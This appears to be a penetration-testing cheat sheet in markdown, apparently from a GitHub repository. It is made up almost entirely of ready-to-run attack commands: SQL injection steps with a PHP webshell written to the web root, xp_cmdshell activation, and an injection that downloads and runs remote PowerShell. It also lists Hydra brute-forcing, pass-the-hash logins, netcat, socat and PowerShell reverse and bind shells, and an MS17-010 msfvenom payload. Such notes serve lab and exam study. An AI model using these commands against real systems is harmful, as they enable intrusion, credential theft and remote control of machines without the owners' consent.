Skip to content

Latest commit

 

History

History
423 lines (358 loc) · 12 KB

exploitation.md

File metadata and controls

423 lines (358 loc) · 12 KB

Exploitation

General

tcpdump

sudo tcpdump -n -i <INTERFACE> port <LISTENING PORT>
sudo tcpdump -n -i tun0 port 80

Exploitation Web application

When modifying web exploits, there are several key questions we generally need to ask while approaching the code:

  • Does it initiate an HTTP or HTTPS connection?
  • Does it access a web application specific path or route?
  • Does the exploit leverage a pre-authentication vulnerability?
  • If not, how does the exploit authenticate to the web application?
  • How are the GET or POST requests crafted to trigger and exploit the vulnerability?
  • Does it rely on default application settings (such as the web path of the application) that may have been changed after installation?
  • Will oddities such as self-signed certificates disrupt the exploit?

SQL Injection

  • Use and and inject it into every parameter and look for possible errors
  • Use # and -- for comments after the injection. (After the -- a space is required)
    • If -- in url the add something behind it so the space doesn't get truncated. For example -- \\
  • If returning multiple rows gives errors use LIMIT 1 in the query
  • Use ORDER BY to find the amount of columns. Increment it by 1 till no output is shown.
  • Use load_file('C:/Windows/System32/drivers/etc/hosts') to load files instead of database data.
  • Use "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '<PATH TO WEBROOT>/backdoor.php' to create a simple php backdoor.

Manual SQL injection

  1. Find the SQL injecton
    • Use and to look for possible errors.
    • Vunerable value for example is artist=1
  2. Find the amount of columns
    • use artist=1 ORDER BY 1. Increment it by 1 till no output or error is given. If artist=1 ORDER BY 4 gives an error, the amount of columns is 3.
  3. Use a union based SQL injection
    • use artist=1 union select 1,2,3 (amount of columns). If no other output is given:
      • use wrong output artist=-1 union select 1,2,3
      • If its a string use artist=-1 union select NULL,NULL,NULL
  4. Fetch the name of the database and version/current user
    • artist=-1 union select 1,database(),3
    • -1 union select 1,version(),current_user()
  5. Fetch the table names inside the database
    • Retrieve all table names
      • artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
    • Get first table name (Limited by first because of the limit 0,1)
      • artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1
    • Get the second table name (Limited by second because of the limit 1,1)
      • artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1
    • Get the rest of the table names
  6. Retrieve columns names
    • artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='<TABLE>'
  7. Get data out of the columns
    • artist=-1 union select 1,group_concat(<COLUMN>),3 from <TABLE>

Using SQLmap

  • Send request you want to fuzz through burp and save it.
  • Use the --batch command to default answer the questions
  • Use the --wizzard flag for easy mode
  • Use the --os-shell flag for easy shell

Run SQLmap and check for vulnerabilities

sqlmap -r <BURP REQUEST FILE>

Print banner to show SQL injection works

sqlmap -r <BURP REQUEST FILE> --banner

Retrieve Database names

sqlmap -r <BURP REQUEST FILE> --dbs

Retrieve table names from database

sqlmap -r <BURP REQUEST FILE> -D <DATABASE> --tables

Retrieve columns out of table

sqlmap -r <BURP REQUEST FILE> -D <DATABASE> -T <TABLE> --columns

Extract data out of data of selected columns

sqlmap -r <BURP REQUEST FILE> -D <DATABASE> -T <TABLE> -C <COLUMN>,<COLUMN> --dump

Dump everything

sqlmap -r <BURP REQUEST FILE> --dump

MYSQL Commands

show grants;
show variables;
show databases;
use <DATABASE>;
show tables;
describe <TABLE>;
SELECT * FROM <TABLE>;

MSSQL

Mssql connect

mssql-cli -S 10.11.1.31 -U sa -P 'poiuytrewq'

Enable XP_Cmdshell

EXECUTE sp_configure 'show advanced options', 1;  
RECONFIGURE;  
EXECUTE sp_configure 'xp_cmdshell', 1;  
RECONFIGURE; 

Execute commands

xp_cmdshell 'whoami'

Random injection shell

a ') EXEC xp_cmdshell 'powershell.exe iex (New-Object Net.WebClient).DownloadString(''http://10.10.14.143:8090/amsi.txt''); iex (New-Object Net.WebClient).DownloadString(''http://10.10.14.143:8090/Invoke-PowerShellTcp2.ps1'')'; --

Webserver shells checklist

  • Check what type of lanuage does the webserver support?
    • ISS = .asp, .aspx
    • PHP = .php
    • Java = .jsp

File upload

File upload intruder extensions list

/opt/SecLists/Discovery/Web-Content/web-extensions.txt

Services

FTP

  • Check if login is allowed as anonymous:anonymous.
ftp <IP>
# Enter anonymous x2

POP read emails

nc -nvC <IP> <PORT>
USER <USERNAME>
PASS <PASSWORD>
LIST
RETR 1 
RETR 2

MSRPC login

evil-winrm -u <USER> -p <PASS> -i <IP>

Password Attacks

https://github.com/danielmiessler/SecLists

Hydra bruteforce FTP

hydra -L <USERNAMEFILE> -P <PASSWORDFILE> -t 24 ftp://<IP>:<PORT>

Hydra bruteforce SSH

hydra -L <USERNAMEFILE> -P <PASSWORDFILE> -t 24 ssh://<IP>:<PORT>

Hydra bruteforce HTTP login

Login using Burp or check in developers tools to check the request for the required information! You need to get the username/password/login parameter and the error message!

https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/

hydra -L <USERNAMEFILE> -P <PASSWORDFILE> <IP> http-post-form "<LOGINPAGE>:<COOKIES FROM BURP AND SET ^USER^ AND ^PASS^>:<ERROR MESSAGE FAILED LOGIN>"

#EXAMPLE hydra -L usernames.txt -P passwords.txt 192.168.2.62 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed"

#EXAMPLE hydra -l admin -P /opt/SecLists/Passwords/xato-net-10-million-passwords-100.txt 10.10.175.0 http-post-form '/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=u8hdjDohYmqfI8o0z7Cev4b1u0jLmv9dNA9NS95wDsZeMYw6zBFeyhiLx1QuOsZ%2FXV%2Fo%2BrCdXSC4Y7%2FueaRnmboaQQ9KZQWLME84zysowmYTAW8Kea1%2Bp7phoEwMiICbLwPPteDEYl7z6nobm8x1Mb2hMDiTpDJhracgmTh%2BJwP1Rqqt&__EVENTVALIDATION=QJmkftZnDEcQIPsstxYKnQBDsulZLsB0kmrbMa4BPzAc%2FMEDChrOmztni5OWBx83r2xGNndCAgw6wJ%2F%2FoAzYtZEcyRWC%2FaPyUR5iWSO0V8%2FIodobow1OxiuoD9uZVnVO8tcQZr3NWYjFcOVxYg5WAWvPyezvfcBk2oxUdZwsutPATiKB&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:failed'

CEWL - Create a wordlist

cewl <URL> -m <MIN CHARS> -w <FILE>.txt

Identify hashes

hashid <HAS>
hash-identiefier

Combine /etc/passwd and /etc/shadow with unshadow

Unshadow <PASSWD FILE> <SHADOW FILE> > unshadow.txt

NFS Shares

Portmapper and RPCBind run on TCP port 111

Enumerations

rpcinfo <IP>
sudo nmap -sSUC -p111 <IP> --script *nfs*

Mount shares

showmount -e <IP>
sudo mount -o nolock <IP>:/<SHARE> <MOUNT LOCATION>
sudo mount -t cifs -o port=<PORT> //<IP>/<SHARE> -o username=<USERNAME>,password=<PASSWORD> /mnt/<FOLDER>

Open file with no permission to file

If a file found which we want to access but don’t have permissions. Make a user with the same username and change the UUID, change to the user so we can access the file.

sudo adduser pwn
sudo vim /etc/passwd

Shells

Listeners

Netcat listener

sudo nc -nlvp <PORT>

Socat listener

sudo socat -d -d TCP4-LISTEN:<PORT> STDOUT

Meterpreter listener

msfconsole
use multi/handler
set payload <PAYLOAD>
run

Powercat listener

. ./powercat.ps1
powercat -l -v -p 10000

Reverse shells

Netcat

nc -nv <IP> <PORT> -e /bin/bash

Socat

socat TCP4:<IP>:<PORT> EXEC:/bin/bash

Powershell

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell.exe iex (iwr http://<IP>/Invoke-PowerShellTcp.ps1 -usebasicparsing);Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
powershell iex (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>

Powercat

powercat -c <IP> -p <PORT> -e cmd.exe

Bind shells

Netcat

nc -nlvp <PORT>

Powershell

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('<IP>',<PORT>);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'P

Powercat

powercat -l -p <PORT> -e cmd.exe

Spawn TTY Shells

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"

Fully interactive stable shell zsh

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
<enter> x2
export TERM=xterm-256color

Fully interactive stable shell bash

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo
fg
fg
export TERM=xterm-256color
stty rows 46 cols 140

Enable tab completion

  1. In your active shell press bg to send your nc session to background
  2. Enter stty raw -echo
  3. Enter fg to bring your nc session to foreground
  4. ```export TERM=xterm-256color``

MSFvenom payloads

Misc

MS17-010

git clone https://github.com/helviojunior/MS17-010
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
nc -lnvp <PORT>
python send_and_execute.py <TARGET IP> ms17-010.exe

PHP Execute commands

<?php
// Return the listing of the directory where the file runs (Windows)
system("dir");
?>
<?php
// Executes but returns nothing
exec("ls -la");
?>
<?php
// Executes, returns the entire output as a string
echo shell_exec("ls -la");
?>
<?php
// Executes, returns output in raw format
passsthru("ls -la");
?>

Path traversal cheatsheet files

https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/

Pass the hash login

First is a empty LM HASH, last one should work as well.

pth-winexe -U <USERNAME>%aad3b435b51404eeaad3b435b51404ee:<NTLM HASH> //<IP> cmd
pth-winexe -U <USERNAME>%<LM HASH>:<NTLM HASH> //<IP> cmd
pth-winexe -U <USERNAME>%:<NTLM HASH> //<IP> cmd

Mysql raptor exploit but better

https://www.exploit-db.com/exploits/46249

Bash fully interactive shell

Start without tmux a /bin/bash shell
nc -lvp <PORT>
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
export TERM=screen